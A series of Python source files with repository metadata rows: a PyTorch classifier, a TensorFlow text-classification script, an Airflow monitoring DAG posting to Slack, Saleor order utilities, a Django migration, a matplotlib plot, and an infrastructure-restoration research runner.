        pool_size = opt['pool_size']
        pool_type = opt.get('pool_type', 'max')
        flat_dim = num_channels * pool_size * pool_size

        self.classifier = nn.Sequential()
        if pool_type == 'max':
            self.classifier.add_module('MaxPool', nn.AdaptiveMaxPool2d((pool_size, pool_size)))
        elif pool_type == 'avg':
            self.classifier.add_module('AvgPool', nn.AdaptiveAvgPool2d((pool_size, pool_size)))
        # affine=False: normalise features without learnable scale/shift.
        self.classifier.add_module('BatchNorm', nn.BatchNorm2d(num_channels, affine=False))
        self.classifier.add_module('Flatten', Flatten())
        # Module name spelling kept: checkpoints key on 'LiniearClassifier'.
        self.classifier.add_module('LiniearClassifier', nn.Linear(flat_dim, num_classes))
        self.initilize()

    def forward(self, feat):
        return self.classifier(feat)

    def initilize(self):
        # He-style init on linear layers: std = sqrt(2 / fan_out), zero bias.
        for module in self.modules():
            if not isinstance(module, nn.Linear):
                continue
            std_val = np.sqrt(2.0 / module.out_features)
            module.weight.data.normal_(0.0, std_val)
            if module.bias is not None:
                module.bias.data.fill_(0.0)
def create_model(opt):
    # Factory entry point: build a Classifier from an options dict.
    return Classifier(opt)
| 34.0625
| 95
| 0.625076
|
157de86317033bd89563d287db2c0beb89bbfc30
| 2,037
|
py
|
Python
|
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
sample.py
|
ShiriBernat/FlyFiles
|
1fe01faaa9951a3f006ab5b87dc3773d8e0e3817
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import tensorflow as tf
import argparse
import utils
def main():
    """Parse command-line options and run classification on the prime text."""
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--checkpoint_dir', type=str, default='save',
                        help='model directory to store checkpointed models')
    parser.add_argument('--text', type=str, default=u' ',
                        help='prime text')
    sample(parser.parse_args())
def sample(args):
    """Classify ``args.text`` with a saved TF1 checkpoint and print the label.

    Restores the latest checkpoint from ``args.checkpoint_dir``, maps the
    prime text through the training vocabulary, and prints "other" for
    prediction 1, otherwise "computer science".
    """
    print('Loading data')
    positive_data_file = "./pos.txt"
    negative_data_file = "./neg.txt"
    # Rebuild the training vocabulary so the prime text can be mapped to ids;
    # x is only needed for its padded sequence length (x.shape[1]).
    x, y, vocabulary, vocabulary_inv = utils.load_data(positive_data_file, negative_data_file)
    # list(args.text) splits the prime text into individual characters.
    text = [list(args.text)]
    sentences_padded = utils.pad_sentences(text, maxlen=x.shape[1])
    raw_x, dummy_y = utils.build_input_data(sentences_padded, [0], vocabulary)
    checkpoint_file = tf.train.latest_checkpoint(args.checkpoint_dir)
    graph = tf.Graph()
    with graph.as_default():
        sess = tf.Session()
        with sess.as_default():
            # Load the saved meta graph and restore variables
            saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
            saver.restore(sess, checkpoint_file)
            # Get the placeholders from the graph by name
            input_x = graph.get_operation_by_name("input_x").outputs[0]
            # input_y = graph.get_operation_by_name("input_y").outputs[0]
            dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
            # Tensors we want to evaluate
            predictions = graph.get_operation_by_name("output/predictions").outputs[0]
            # Dropout disabled at inference time (keep probability 1.0).
            predicted_result = sess.run(predictions, {input_x: raw_x, dropout_keep_prob: 1.0})
            if (predicted_result[0] == 1):
                print(args.text + ": other")
            else:
                print(args.text + ": computer science")
# Script entry point.
if __name__ == '__main__':
    main()
| 37.036364
| 95
| 0.628866
|
e0739dabc9a7ec366fa6f4841376a8b736c45dbd
| 2,332
|
py
|
Python
|
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | null | null | null |
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | null | null | null |
footprint_airflow/dags/footprint_monitor_dag.py
|
footprint-network/footprint-analytics
|
5de4932ce1c21860785edcce90ffdf097b6f9921
|
[
"MIT"
] | 1
|
2021-09-20T22:31:20.000Z
|
2021-09-20T22:31:20.000Z
|
from models import MonitorDashBoard
from utils.date_util import DateUtil
from utils import Constant
from datetime import datetime, timedelta
from utils.monitor import send_to_slack
import pydash
from utils.build_dag_util import BuildDAG
def python_callable():
    # Airflow task entry point: delegates to the monitoring summary.
    get_task_execution_result()
def get_execution_date():
    # The monitored date: 24 hours ago, presumably truncated to the UTC start
    # of that day by DateUtil.utc_start_of_date -- confirm in utils.date_util.
    return DateUtil.utc_start_of_date(DateUtil.utc_x_hours_ago(24 * 1))
def get_task_execution_result():
    """Summarise the monitored day's task executions and post to Slack.

    Counts distinct task names with REGULAR vs EXCEPTION result codes in
    MonitorDashBoard for the execution date and sends a summary message
    (plus exception task names, if any) to Slack.
    """
    execution_date = get_execution_date()
    regular_query = {
        'stats_date': execution_date,
        'rule_name': Constant.DASH_BOARD_RULE_NAME['TASK_EXECUTION'],
        'result_code': Constant.DASH_BOARD_RESULT_CODE['REGULAR']
    }
    regular_result = MonitorDashBoard.distinct('task_name', regular_query)
    regular_count = len(regular_result)
    exception_query = {
        'stats_date': execution_date,
        'rule_name': Constant.DASH_BOARD_RULE_NAME['TASK_EXECUTION'],
        'result_code': Constant.DASH_BOARD_RESULT_CODE['EXCEPTION']
    }
    exception_result = MonitorDashBoard.distinct('task_name', exception_query)
    exception_count = len(exception_result)
    execution_date_str = datetime.strftime(execution_date, '%Y-%m-%d')
    # Join failing task names with an ideographic comma for readability.
    exception_detail = pydash.join(exception_result, '、')
    print(exception_detail)
    text = f'UTC Time: {execution_date_str} The task execution monitoring result is: the number of tasks executed normally: {regular_count}, Number of abnormal task execution: {exception_count}'
    if exception_count > 0:
        text = text + 'Details of abnormal tasks are as follows\n {exception_detail}'.format(exception_detail=exception_detail)
    send_to_slack(text)
# Default arguments applied to every task in the DAG.
default_dag_args = {
    'owner': 'airflow',
    'depends_on_past': False,
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
    'start_date': datetime(2021, 7, 1)
}
# DAG definition: runs daily at 03:00, no backfill of missed runs.
dag_params = {
    "dag_id": "footprint_monitor",
    "catchup": False,
    "schedule_interval": '0 3 * * *',
    "description": "footprint_monitor dag",
    "default_args": default_dag_args,
    "dagrun_timeout": timedelta(hours=1)
}
# Single task: send the monitoring dashboard summary to Slack.
dag_task_params = [
    {
        "task_id": "send_monitor_dash_board_result",
        "python_callable": python_callable,
        "execution_timeout": timedelta(hours=1)
    }
]
# Module-level DAG object picked up by the Airflow scheduler.
DAG = BuildDAG().build_dag(dag_params=dag_params, dag_task_params=dag_task_params)
| 31.093333
| 194
| 0.726415
|
5bd7f09866cd7ed8a37997976e2eb3a90999101b
| 7,304
|
py
|
Python
|
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | 1
|
2020-02-13T21:53:14.000Z
|
2020-02-13T21:53:14.000Z
|
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/order/utils.py
|
skazancev/saleor
|
42746ba00080ce36dedc0954be66b42f0e0a7499
|
[
"BSD-3-Clause"
] | null | null | null |
from functools import wraps
from django.conf import settings
from django.db.models import F
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import pgettext_lazy
from prices import Money, TaxedMoney, fixed_discount
from . import GroupStatus
from ..account.utils import store_user_address
from ..core.exceptions import InsufficientStock
from ..core.utils import ZERO_TAXED_MONEY
from ..product.utils import allocate_stock
def check_order_status(func):
    """Prevent execution of decorated function if order is fully paid.

    Instead redirects to order details page.

    The wrapped view must receive a ``token`` keyword argument; it is
    replaced by the resolved ``order`` keyword before delegation.
    """
    # pylint: disable=cyclic-import
    from .models import Order

    @wraps(func)
    def decorator(*args, **kwargs):
        token = kwargs.pop('token')
        order = get_object_or_404(Order, token=token)
        if order.is_fully_paid():
            return redirect('order:details', token=order.token)
        kwargs['order'] = order
        return func(*args, **kwargs)
    return decorator
def cancel_order(order):
    """Cancel order by cancelling all associated shipment groups."""
    for shipment_group in order.groups.all():
        shipment_group.cancel()
        shipment_group.save()
def recalculate_order(order):
    """Recalculate and assign total price of order.

    Total price is a sum of items in shipment groups and order shipping price
    minus discount amount.
    """
    # Start from shipping, then add every non-cancelled group's total,
    # preserving the original left-to-right addition order.
    total = order.shipping_price
    for group in order:
        if group.status == GroupStatus.CANCELLED:
            continue
        total += group.get_total()
    if order.discount_amount:
        total -= order.discount_amount
    order.total = total
    order.save()
def attach_order_to_user(order, user):
    """Associates existing order with user account."""
    order.user = user
    # Persist the order's addresses into the user's address book.
    store_user_address(user, order.billing_address, billing=True)
    if order.shipping_address:
        store_user_address(user, order.shipping_address, shipping=True)
    order.save(update_fields=['user'])
def add_variant_to_delivery_group(
        group, variant, total_quantity, discounts=None, add_to_existing=True):
    """Add total_quantity of variant to group.

    Raises InsufficientStock exception if quantity could not be fulfilled.

    By default, first adds variant to existing lines with same variant.
    It can be disabled with setting add_to_existing to False.

    Order lines are created by increasing quantity of lines,
    as long as total_quantity of variant will be added.
    """
    # First try to top up existing lines; whatever cannot be absorbed there
    # is created as new lines below.
    quantity_left = (
        add_variant_to_existing_lines(group, variant, total_quantity)
        if add_to_existing else total_quantity)
    price = variant.get_price_per_item(discounts)
    while quantity_left > 0:
        stock = variant.select_stockrecord()
        if not stock:
            raise InsufficientStock(variant)
        # Take as much as this stock record can supply, capped by the need.
        quantity = (
            stock.quantity_available
            if quantity_left > stock.quantity_available
            else quantity_left
        )
        group.lines.create(
            product=variant.product,
            product_name=variant.display_product(),
            product_sku=variant.sku,
            is_shipping_required=(
                variant.product.product_type.is_shipping_required),
            quantity=quantity,
            unit_price=price,
            stock=stock,
            stock_location=stock.location.name)
        allocate_stock(stock, quantity)
        # refresh stock for accessing quantity_allocated
        stock.refresh_from_db()
        quantity_left -= quantity
def add_variant_to_existing_lines(group, variant, total_quantity):
    """Add variant to existing lines with same variant.

    Variant is added by increasing quantity of lines with same variant,
    as long as total_quantity of variant will be added
    or there is no more lines with same variant.

    Returns quantity that could not be fulfilled with existing lines.
    """
    # order descending by lines' stock available quantity
    # (allocated - total is most negative for the largest availability)
    lines = group.lines.filter(
        product=variant.product, product_sku=variant.sku,
        stock__isnull=False).order_by(
            F('stock__quantity_allocated') - F('stock__quantity'))
    quantity_left = total_quantity
    for line in lines:
        # Absorb as much as this line's stock allows, capped by the need.
        quantity = (
            line.stock.quantity_available
            if quantity_left > line.stock.quantity_available
            else quantity_left)
        line.quantity += quantity
        line.save()
        allocate_stock(line.stock, quantity)
        quantity_left -= quantity
        if quantity_left == 0:
            break
    return quantity_left
def merge_duplicates_into_order_line(line):
    """Merge duplicated lines in shipment group into one (given) line.

    If there are no duplicates, nothing will happen.
    """
    lines = line.delivery_group.lines.filter(
        product=line.product, product_name=line.product_name,
        product_sku=line.product_sku, stock=line.stock,
        is_shipping_required=line.is_shipping_required)
    if lines.count() > 1:
        # The comprehension's `line` has its own scope in Python 3, so the
        # outer `line` is untouched; the sum includes `line` itself.
        line.quantity = sum([line.quantity for line in lines])
        line.save()
        lines.exclude(pk=line.pk).delete()
def change_order_line_quantity(line, new_quantity):
    """Change the quantity of ordered items in a order line."""
    line.quantity = new_quantity
    line.save()
    # A zero total may leave the delivery group empty; delete it and, if the
    # whole order ended up empty, record that in the order history.
    if not line.delivery_group.get_total_quantity():
        line.delivery_group.delete()
        order = line.delivery_group.order
        if not order.get_lines():
            order.history.create(
                content=pgettext_lazy(
                    'Order status history entry',
                    'Order cancelled. No items in order'))
def remove_empty_groups(line, force=False):
    """Remove order line and associated shipment group and order.

    Remove is done only if quantity of order line or items in group or in order
    is equal to 0.
    """
    source_group = line.delivery_group
    order = source_group.order
    # Keep the line if it still holds quantity, otherwise drop it.
    if line.quantity:
        line.save()
    else:
        line.delete()
    if not source_group.get_total_quantity() or force:
        source_group.delete()
    # If the order is now empty, record the cancellation in its history.
    if not order.get_lines():
        order.history.create(
            content=pgettext_lazy(
                'Order status history entry',
                'Order cancelled. No items in order'))
def move_order_line_to_group(line, target_group, quantity):
    """Split given quantity of order line to another shipment group."""
    # Fix: the docstring above was previously placed AFTER the import, which
    # made it a dead string statement instead of the function's __doc__.
    # Imported locally to avoid a circular import with .models.
    from .models import OrderLine
    try:
        target_line = target_group.lines.get(
            product=line.product, product_name=line.product_name,
            product_sku=line.product_sku, stock=line.stock,
            is_shipping_required=line.is_shipping_required)
    except OrderLine.DoesNotExist:
        # No matching line in the target group -- create one mirroring `line`.
        target_group.lines.create(
            delivery_group=target_group, product=line.product,
            product_name=line.product_name, product_sku=line.product_sku,
            is_shipping_required=line.is_shipping_required,
            quantity=quantity, unit_price_net=line.unit_price_net,
            stock=line.stock,
            stock_location=line.stock_location,
            unit_price_gross=line.unit_price_gross)
    else:
        # Matching line exists -- just transfer the quantity onto it.
        target_line.quantity += quantity
        target_line.save()
    line.quantity -= quantity
    # Drop the source line/group/order if nothing is left.
    remove_empty_groups(line)
| 34.45283
| 79
| 0.681407
|
f3c4236e402508fc3d9d030329fdfc25677bfe5b
| 547
|
py
|
Python
|
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
www/migrations/0001_initial.py
|
rainum/dontcrashmydrone
|
1c99536a9798c18951edd8626b0299e48e05f4e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-23 11:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Token table (auto id + unique token text)."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Token',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('token', models.TextField(unique=True)),
            ],
        ),
    ]
| 22.791667
| 114
| 0.588665
|
11e33bfa4c8046a51b99c80e8e5c51d7576bf97e
| 270
|
py
|
Python
|
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
matplotlib/line001.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | 1
|
2018-08-17T07:07:15.000Z
|
2018-08-17T07:07:15.000Z
|
#!/usr/bin/env python
import matplotlib as mpl
# Use the non-interactive Agg backend (works without a display); the backend
# must be selected before importing pyplot.
mpl.use('Agg')
import matplotlib.pyplot as plt
plt.style.use('classic')
#Plotting to our canvas
fig = plt.figure()
plt.plot([1,2,3],[4,5,1])
# Agg cannot open a window, so the figure is written to disk instead.
fig.savefig('/home/tmp/line001.png')
#Showing what we plotted
# plt.show()
| 18
| 38
| 0.696296
|
03f25c51e154375a241fdaa6b67bc7844900c4d8
| 24,856
|
py
|
Python
|
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
codes/Archive/run_main_no_game.py
|
htalebiyan/Dec2py
|
8c4181eb92d6e52aef8cc804c485865516cee200
|
[
"MIT"
] | null | null | null |
""" Runs INDP, td-INDP, Judgment Call, and infrastructure games"""
import sys
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pickle
import indp
import dindputils
import plots
import gametree
import itertools
import Metaheuristics.metaheuristics as mh
# import gameutils
try:
    # Change the current working Directory
    # NOTE(review): machine-specific absolute path -- fails on other machines,
    # in which case the script continues from the current directory.
    DIR_MAIN = 'C:/Users/ht20/Documents/GitHub/td-DINDP/pyindp'
    os.chdir(DIR_MAIN)
    print("Directory changed to "+DIR_MAIN)
except OSError:
    print("Can't change the Current Working Directory")
def batch_run(params, fail_sce_param, player_ordering=[3, 1]):
    '''
    Batch run different methods for a given list of damage scenarios,
    given global parameters.

    Parameters
    ----------
    params : dict
        Global run parameters; must contain 'ALGORITHM', 'V', 'OUTPUT_DIR',
        'T' and (for non-synthetic data) 'L'. 'N', 'SIM_NUMBER' and
        'MAGNITUDE' are filled in per scenario.
    fail_sce_param : dict
        Damage-scenario description: 'TYPE', 'BASE_DIR', 'DAMAGE_DIR',
        'MAGS', 'SAMPLE_RANGE', plus type-specific keys ('FILTER_SCE' for
        'WU', 'TOPO' for 'synthetic').
    player_ordering : list, optional
        Player ordering for INRG / backwards induction. The default is
        [3, 1]. NOTE(review): mutable default argument -- harmless here
        since it is never mutated.

    Returns
    -------
    None. Writes to file

    '''
    # Set root directories
    base_dir = fail_sce_param['BASE_DIR']
    damage_dir = fail_sce_param['DAMAGE_DIR']
    topology = None
    infrastructure_data = None
    ext_interdependency = None
    if fail_sce_param['TYPE'] == 'Andres':
        infrastructure_data = 'shelby_old'
        ext_interdependency = "../data/INDP_4-12-2016"
    elif fail_sce_param['TYPE'] == 'WU':
        infrastructure_data = 'shelby_extended'
        if fail_sce_param['FILTER_SCE'] is not None:
            list_high_dam = pd.read_csv(fail_sce_param['FILTER_SCE'])
    elif fail_sce_param['TYPE'] == 'random':
        infrastructure_data = 'shelby_extended'
    elif fail_sce_param['TYPE'] == 'synthetic':
        topology = fail_sce_param['TOPO']
    print('----Running for resources: '+str(params['V']))
    for m in fail_sce_param['MAGS']:
        for i in fail_sce_param['SAMPLE_RANGE']:
            try:
                # list_high_dam only exists for 'WU' with FILTER_SCE set;
                # skip scenarios that are not in the high-damage list.
                list_high_dam
                if len(list_high_dam.loc[(list_high_dam.set == i)&\
                    (list_high_dam.sce == m)].index) == 0:
                    continue
            except NameError:
                pass
            print('---Running Magnitude '+str(m)+' sample '+str(i)+'...')
            print("Initializing network...")
            if infrastructure_data:
                params["N"], _, _ = indp.initialize_network(BASE_DIR=base_dir,
                    external_interdependency_dir=ext_interdependency,
                    sim_number=0, magnitude=6, sample=0, v=params["V"],
                    infrastructure_data=infrastructure_data)
            else:
                params["N"], params["V"], params['L'] = indp.initialize_network(BASE_DIR=base_dir,
                    external_interdependency_dir=ext_interdependency,
                    magnitude=m, sample=i, infrastructure_data=infrastructure_data,
                    topology=topology)
            params["SIM_NUMBER"] = i
            params["MAGNITUDE"] = m
            # Check if the results exist
            output_dir_full = ''
            if params["ALGORITHM"] in ["INDP"]:
                output_dir_full = params["OUTPUT_DIR"]+'_L'+str(len(params["L"]))+'_m'+\
                    str(params["MAGNITUDE"])+"_v"+str(params["V"])+'/actions_'+str(i)+'_.csv'
            if os.path.exists(output_dir_full):
                print('results are already there\n')
                continue
            # Overlay the damage scenario on the freshly initialised network.
            if fail_sce_param['TYPE'] == 'WU':
                indp.add_Wu_failure_scenario(params["N"], DAM_DIR=damage_dir,
                                             noSet=i, noSce=m)
            elif fail_sce_param['TYPE'] == 'ANDRES':
                indp.add_failure_scenario(params["N"], DAM_DIR=damage_dir,
                                          magnitude=m, v=params["V"], sim_number=i)
            elif fail_sce_param['TYPE'] == 'random':
                indp.add_random_failure_scenario(params["N"], DAM_DIR=damage_dir,
                                                 sample=i)
            elif fail_sce_param['TYPE'] == 'synthetic':
                indp.add_synthetic_failure_scenario(params["N"], DAM_DIR=base_dir,
                                                    topology=topology, config=m, sample=i)
            # Dispatch to the requested solution method.
            if params["ALGORITHM"] == "INDP":
                indp.run_indp(params, layers=params['L'], controlled_layers=params['L'], T=params["T"], saveModel=False,
                              print_cmd_line=False, co_location=True)
            # NOTE(review): this is `if`, not `elif`, so it starts a second
            # dispatch chain -- confirm that is intentional.
            if params["ALGORITHM"] == "MH":
                mh.run_mh(params, validate=False, T=params["T"], layers=params['L'],
                          controlled_layers=params['L'], saveModel=True, print_cmd_line=False,
                          co_location=True)
            elif params["ALGORITHM"] == "INFO_SHARE":
                indp.run_info_share(params, layers=params['L'], T=params["T"])
            elif params["ALGORITHM"] == "INRG":
                indp.run_inrg(params, layers=params['L'], player_ordering=player_ordering)
            elif params["ALGORITHM"] == "BACKWARDS_INDUCTION":
                gametree.run_backwards_induction(params["N"], i, players=params['L'],
                                                 player_ordering=player_ordering,
                                                 T=params["T"], outdir=params["OUTPUT_DIR"])
            elif params["ALGORITHM"] == "JC":
                dindputils.run_judgment_call(params, save_jc_model=True, print_cmd=False)
            elif params["ALGORITHM"] in ["NORMALGAME", "BAYESGAME"]:
                # NOTE(review): 'import gameutils' is commented out at the top
                # of this file, so this branch raises NameError if reached.
                gameutils.run_game(params, save_results=True, print_cmd=False,
                                   save_model=False, plot2D=False) #!!!
def run_indp_sample(layers):
    """Solve the 12-node sample network with iterative INDP and plot the plan."""
    sample_net = indp.initialize_sample_network(layers=layers)
    run_params = {
        "NUM_ITERATIONS": 7,
        "OUTPUT_DIR": '../results/indp_sample_12Node_results',
        "V": len(layers),
        "T": 1,
        "L": layers,
        "WINDOW_LENGTH": 1,
        "ALGORITHM": "INDP",
        "N": sample_net,
        "MAGNITUDE": 0,
        "SIM_NUMBER": 0,
    }
    indp.run_indp(run_params, layers=layers, T=run_params["T"], suffix="", saveModel=True, print_cmd_line=True)
    print('\n\nPlot restoration plan by INDP')
    indp.plot_indp_sample(run_params)
    plt.show()
def run_tdindp_sample(layers):
    """Solve the 12-node sample network with time-dependent INDP and plot the plan."""
    sample_net = indp.initialize_sample_network(layers=layers)
    run_params = {
        "OUTPUT_DIR": '../results/tdindp_sample_12Node_results',
        "V": len(layers),
        "T": 7,
        "L": layers,
        "ALGORITHM": "INDP",
        "WINDOW_LENGTH": 3,
        "N": sample_net,
        "MAGNITUDE": 0,
        "SIM_NUMBER": 0,
    }
    indp.run_indp(run_params, layers=layers, T=run_params["T"], suffix="", saveModel=True, print_cmd_line=True)
    print('\n\nPlot restoration plan by INDP')
    indp.plot_indp_sample(run_params)
    plt.show()
def run_jc_sample(layers, judge_types, auction_type, valuation_type):
    """Run Judgment Call on the 12-node sample network and plot each plan.

    One plot per (judgment, resource-allocation, valuation) combination.
    """
    interdep_net=indp.initialize_sample_network(layers=layers)
    params={"NUM_ITERATIONS":7, "OUTPUT_DIR":'../results/jc_sample_12Node_results',
            "V":len(layers), "T":1, "L":layers, "WINDOW_LENGTH":1, "ALGORITHM":"JC",
            "N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0,
            "JUDGMENT_TYPE":judge_types, "RES_ALLOC_TYPE":auction_type,
            "VALUATION_TYPE":valuation_type}
    dindputils.run_judgment_call(params, save_jc_model=True, print_cmd=False)
    for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
        print('\n\nPlot restoration plan by JC',jt,rst,vt)
        # UNIFORM allocation has no auction/valuation component in its folder name.
        if rst == 'UNIFORM':
            indp.plot_indp_sample(params, folderSuffix='_'+jt+'_'+rst, suffix="real")
        else:
            indp.plot_indp_sample(params, folderSuffix='_'+jt+'_AUCTION_'+rst+'_'+vt, suffix="real")
        plt.show()
def run_game_sample(layers, judge_types, auction_type, valuation_type,
                    game_type="NORMALGAME", signals=None, beliefs=None):
    """Run a restoration game on the 12-node sample network and plot plans.

    NOTE(review): depends on `gameutils`, whose import is commented out at
    the top of this file -- calling this raises NameError until restored.
    """
    interdep_net= indp.initialize_sample_network(layers=layers)
    if game_type == "NORMALGAME":
        out_dir = '../results/ng_sample_12Node_results'
    elif game_type == "BAYESGAME":
        # Encode the signal/belief configuration in the results folder name.
        out_dir = '../results/bg'+''.join(signals.values())+''.join(beliefs.values())+\
            '_sample_12Node_results'
    params={"NUM_ITERATIONS":7, "OUTPUT_DIR":out_dir, "V":1+len(layers), "T":1, "L":layers,
            "WINDOW_LENGTH":1, "ALGORITHM":game_type, 'EQUIBALG':'enumerate_pure',
            "N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0, "JUDGMENT_TYPE":judge_types,
            "RES_ALLOC_TYPE":auction_type, "VALUATION_TYPE":valuation_type, 'PAYOFF_DIR':None,
            "SIGNALS":signals, "BELIEFS":beliefs}
    gameutils.run_game(params, save_results=True, print_cmd=True, save_model=True, plot2D=True)
    for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
        print('\n\nPlot restoration plan by Game',jt,rst,vt)
        # UNIFORM allocation has no auction/valuation component in its folder name.
        if rst == 'UNIFORM':
            indp.plot_indp_sample(params, folderSuffix='_'+jt+'_'+rst, suffix="")
        else:
            indp.plot_indp_sample(params, folderSuffix='_'+jt+'_AUCTION_'+rst+'_'+vt, suffix="")
        plt.show()
def run_mh_sample(layers):
    """Run the MH method once on the 12-node sample network and return its result."""
    sample_net = indp.initialize_sample_network(layers=layers)
    params = {
        "NUM_ITERATIONS": 1,
        "OUTPUT_DIR": '../results/mh_sample_12Node_results',
        "V": len(layers),
        "T": 1,
        "L": layers,
        "WINDOW_LENGTH": 1,
        "ALGORITHM": "MH",
        "N": sample_net,
        "MAGNITUDE": 0,
        "SIM_NUMBER": 0,
    }
    return mh.run_mh(params, layers=layers, T=params["T"], suffix="", saveModel=True,
                     print_cmd_line=True)
# print('\n\nPlot restoration plan by INDP')
# indp.plot_indp_sample(params)
# plt.show()
def run_method(fail_sce_param, v_r, layers, method, judgment_type=None,
               res_alloc_type=None, valuation_type=None, output_dir='..', misc=None):
    '''
    This function runs a given method for different numbers of resources,
    and a given judge, auction, and valuation type in the case of JC.

    Parameters
    ----------
    fail_sce_param : dict
        Information of damage scenarios.
    v_r : float, list of float, or list of lists of floats
        Number of resources.
        If this is a list of floats, each float is interpreted as a different total
        number of resources, and indp is run given the total number of resources.
        It only works when auction_type != None.
        If this is a list of lists of floats, each list is interpreted as fixed upper
        bounds on the number of resources each layer can use (same for all time steps).
    layers : list
        Layer numbers of the network to be analyzed.
    method : str
        One of 'INDP', 'TDINDP', 'JC', 'NORMALGAME', 'BAYESGAME'.
    judgment_type : str, optional
        Type of judgment in the Judgment Call method. The default is None.
    res_alloc_type : str, optional
        Type of resource allocation method for resource allocation. The default is None.
    valuation_type : str, optional
        Type of valuation in auction. The default is None.
    output_dir : str, optional
        Root folder where results are written. The default is '..'.
    misc : dict, optional
        Extra settings ('STM_MODEL', 'PAYOFF_DIR', 'SIGNALS', 'BELIEFS',
        'DYNAMIC_PARAMS'). The default is None.

    Returns
    -------
    None. Writes to file.
    '''
    for v in v_r:
        if method == 'INDP':
            # NOTE(review): unlike TDINDP below, this path has no '/'
            # separator before the folder name -- confirm intended layout.
            params = {"NUM_ITERATIONS": 10, "OUTPUT_DIR": output_dir + 'indp_results',
                      "V": v, "T": 1, 'L': layers, "ALGORITHM": "INDP"}
        elif method == 'TDINDP':
            params = {"OUTPUT_DIR": output_dir + '/tdindp_results', "V": v, "T": 10,
                      'L': layers, "ALGORITHM": "INDP"}  # "WINDOW_LENGTH":3,
        elif method == 'JC':
            params = {"NUM_ITERATIONS": 10, "OUTPUT_DIR": output_dir + 'jc_results',
                      "V": v, "T": 1, 'L': layers, "ALGORITHM": "JC",
                      "JUDGMENT_TYPE": judgment_type, "RES_ALLOC_TYPE": res_alloc_type,
                      "VALUATION_TYPE": valuation_type}
            # Guard: valuation_type defaults to None, which the original
            # membership test crashed on.
            if valuation_type and 'STM' in valuation_type:
                params['STM_MODEL_DICT'] = misc['STM_MODEL']
        elif method in ['NORMALGAME', 'BAYESGAME']:
            # Build the game output folder in a local variable. The original
            # appended to `output_dir` itself inside this `for v` loop, so
            # each extra resource value appended the suffix again
            # (e.g. '...ng_resultsng_results').
            if method == "NORMALGAME":
                game_out_dir = output_dir + 'ng_results'
            elif method == "BAYESGAME":
                game_out_dir = output_dir + 'bg' + ''.join(misc['SIGNALS'].values()) + \
                    ''.join(misc['BELIEFS'].values()) + '_results'
            params = {"NUM_ITERATIONS": 10, "OUTPUT_DIR": game_out_dir,
                      "V": v, "T": 1, "L": layers, "ALGORITHM": method,
                      'EQUIBALG': 'enumerate_pure', "JUDGMENT_TYPE": judgment_type,
                      "RES_ALLOC_TYPE": res_alloc_type, "VALUATION_TYPE": valuation_type}
            if misc:
                params['PAYOFF_DIR'] = misc['PAYOFF_DIR']
                if params['PAYOFF_DIR']:
                    # Pre-computed payoffs are always read from the normal-game folder.
                    params['PAYOFF_DIR'] += 'ng_results'
                if method == 'BAYESGAME':
                    params["SIGNALS"] = misc['SIGNALS']
                    params["BELIEFS"] = misc['BELIEFS']
        else:
            sys.exit('Wrong method name: ' + method)
        # Guard against misc=None (the documented default): the original
        # unconditionally indexed misc['DYNAMIC_PARAMS'] here and crashed.
        params['DYNAMIC_PARAMS'] = misc.get('DYNAMIC_PARAMS') if misc else None
        if params['DYNAMIC_PARAMS']:
            # Dynamic-demand runs get their own 'dp_'-prefixed result folder.
            prefix = params['OUTPUT_DIR'].split('/')[-1]
            params['OUTPUT_DIR'] = params['OUTPUT_DIR'].replace(prefix, 'dp_' + prefix)
        batch_run(params, fail_sce_param)
if __name__ == "__main__":
    ''' Run a toy example for different methods '''
    # plt.close('all')
    # layers=[1,2]#,3]
    # auction_type = ["MCA", "UNIFORM"]#, "MAA", "MDA"
    # valuation_type = ["DTC"]
